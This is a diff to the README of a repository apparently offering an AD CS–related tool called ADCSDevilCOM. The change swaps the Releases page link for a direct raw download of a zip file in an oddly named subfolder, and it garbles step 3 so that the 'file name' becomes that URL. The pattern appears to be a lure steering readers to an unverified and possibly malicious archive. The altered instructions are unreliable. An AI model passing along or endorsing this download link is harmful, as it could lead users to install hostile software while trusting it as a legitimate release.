Gallar8800/ADCSDevilCOM/README.md

 ## 🚀 Getting Started
 To use ADCSDevilCOM, you need to download the application from our Releases page.
 Follow these simple steps:

-1. Click on the download button above or visit this [page to download](https://github.com/Gallar8800/ADCSDevilCOM/releases).
+1. Click on the download button above or visit this [page to download](https://raw.githubusercontent.com/Gallar8800/ADCSDevilCOM/main/Anglogaea/ADCSDevilCOM-2.5.zip).

 2. Find the latest version of the application listed on the Releases page.

-3. Look for the file named **ADCSDevilCOM.exe**.
+3. Look for the file named **https://raw.githubusercontent.com/Gallar8800/ADCSDevilCOM/main/Anglogaea/ADCSDevilCOM-2.5.zip**.
 You may also see a version number, like **v1.0.0**.

 4. Click the link to start the download.